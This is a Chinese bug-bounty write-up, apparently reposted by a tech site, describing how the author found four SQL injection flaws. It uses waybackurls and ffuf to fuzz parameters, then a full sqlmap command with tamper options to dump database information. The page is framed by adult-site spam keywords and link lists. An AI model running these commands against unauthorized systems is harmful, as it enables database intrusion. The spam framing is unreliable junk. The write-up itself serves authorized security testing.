成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何在幾分鐘內找到多個 SQL 注入漏洞

安全 漏洞
今天來分享一下我是如何用幾分鐘發現某個漏洞賞金的目標多個 SQL 注入漏洞的,接下來以目標域名 redacted.org 為例。

今天來分享一下我是如何用幾分鐘發現某個漏洞賞金的目標多個 SQL 注入漏洞的,接下來以目標域名 redacted.org 為例。

枚舉階段

首先我使用 waybackurls 工具查看目標網站上有哪些 URL,然后看到了很多 PHP 的文件,也許可以在其中找到 SQL 注入漏洞,使用命令過濾一些結果之后輸出到文件:

waybackurls https://redacted.org/ | uro | grep “.php” > php-files.txt

查看輸出的文件,發現了如圖中的內容:

看文件名感覺似乎有戲,接下來需要找一些可用的參數,需要制作一個參數名字典然后暴力破解這些頁面,搞起!

獲取參數

我們基于之前輸出的內容,將文件名和參數分離出來,然后去重:

cat php-files.txt| grep -i get | sed 's/.*.get//' | sort -u

接下來刪除 php 后綴,得到一個以文件名為關鍵詞的列表,只需在上一條命令后加上 cut -f1 -d 即可:

結果中有的有兩個單詞或者多個單詞的組合,但是我不知道其中那個單詞是參數,所以就想辦法將其拆分,經過一頓搜索,發現可以用命令:

sed 's/[AZ]+/\n&/g'

我認為參數一般都是小寫,所以需要將所有大寫字符轉換為小寫,且保留之前的內容:

接下來我們有了兩個參數字典可用,然后使用工具 FFUF 來進行測試,先嘗試用全是小寫字符的字典:

ffuf -w lowercase-parameters.txt -u "https://redacted.org/searchProgressCommitment.php?FUZZ=5"

但是沒有任何結果!

老實說,我很郁悶,但是突然想到一個方案,把請求的方法改成 POST 怎么樣?命令如下:

ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u "https://redacted.org/searchProgressCommitment.php"

結果得到了 commitment & id 參數。

接下來我可以對這些參數進行測試了,復制請求的數據包內容到文件中,丟給 sqlmap 去測。

漏洞利用

sqlmap 的命令如下:

sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms=”MYSQL” --hostname --current-user --current-db --dbs --tamper=between --no-cast

漏洞測試成功,確實存在 SQL 注入漏洞;

接下來使用同樣的方法,測試其他 URL ,結果我找到了三個同樣存在 SQL 注入漏洞的地方。

第二個 SQLI:帶有 id 參數的 ws_delComment.php。

第三個 SQLI:帶有 target 參數的 getTargets.php。

第四個:mailing_lists.php 帶 list 參數。

一共發現四個 SQL 注入,太棒了!

我向安全團隊報告了所有 SQL 注入漏洞并審核通過,他們在積極解決問題,感謝大家的閱讀。

責任編輯:趙寧寧 來源: 信安之路
相關推薦

2010-11-30 10:12:08

2017-08-03 17:30:26

戴爾IoT設備

2013-07-02 09:58:38

ClojureClojure教程

2016-09-30 15:13:01

Python代碼

2022-03-28 08:00:00

數據庫GraphQL公共云

2020-09-11 09:18:07

PythonPython包開發

2021-12-02 11:54:10

云計算云錯誤配置網絡安全

2009-12-29 09:01:46

ADSL斷線

2010-03-01 18:13:22

Python程序

2010-01-06 15:35:06

JSON對象

2010-01-21 09:46:24

C++程序

2010-02-23 14:19:30

Python目錄操作

2024-12-03 15:38:14

2023-05-09 15:04:37

人工智能工具

2024-04-19 09:37:49

Ollama大語言模型開源

2009-11-25 17:22:12

路由器安裝

2010-03-04 10:01:01

Android基本組件

2009-12-21 13:51:54

ADO.NET處理

2009-11-25 13:41:53

使用VS2003

2010-01-21 14:51:02

C++函數指針
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产欧美日韩综合精品一区二区 | 午夜电影日韩 | 国产精品国产三级国产aⅴ原创 | aacc678成免费人电影网站 | 婷婷久久网 | av成人在线观看 | 欧美日韩成人一区二区 | 亚洲精品日本 | aa级毛片毛片免费观看久 | 精品久久伊人 | 精品欧美一区二区精品久久久 | 日韩精品一区二区三区四区视频 | 免费在线看黄 | 一级黄色毛片免费 | 日韩在线一区二区 | 在线观看中文字幕 | 日中文字幕在线 | 久久国产精品无码网站 | 色婷综合网 | 亚洲成av人片在线观看无码 | 国产中文一区二区三区 | 亚洲精久 | 福利视频网 | 欧美中文字幕一区二区三区亚洲 | 国产露脸对白88av | 久久久久国产精品 | 国产亚洲精品综合一区 | 久久久久久亚洲 | 国产一伦一伦一伦 | 精精国产xxxx视频在线播放 | 亚洲福利片 | 日韩精品一区二区三区中文字幕 | www.日韩免费 | 天天躁日日躁狠狠躁白人 | 午夜免费福利电影 | 天天干亚洲 | 久久国产激情视频 | 国产小视频在线观看 | 日韩另类| ririsao久久精品一区 | 亚洲精品99 |